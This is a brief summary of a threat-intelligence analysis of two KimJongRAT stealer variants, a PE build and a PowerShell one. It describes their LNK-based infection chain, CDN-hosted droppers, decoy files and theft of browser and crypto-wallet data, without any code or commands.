VERY IMPORTANT

This article analyzes two new variants of the KimJongRAT stealer: a Portable Executable (PE) variant and a PowerShell implementation. Both variants use a multi-stage infection process, starting with a Windows shortcut (LNK) file that downloads a dropper from a content delivery network. The PE variant deploys a loader, decoy PDF, and text file, while the PowerShell variant deploys a decoy PDF and ZIP archive containing scripts. Both variants gather victim information and browser data, including from crypto-wallet extensions. The PowerShell variant focuses more on cryptocurrency, searching for an extensive list of browser wallet extensions. The malware uses legitimate CDN services to mask its distribution and has evolved since its first appearance in 2013, showcasing the developers' commitment to updating its capabilities.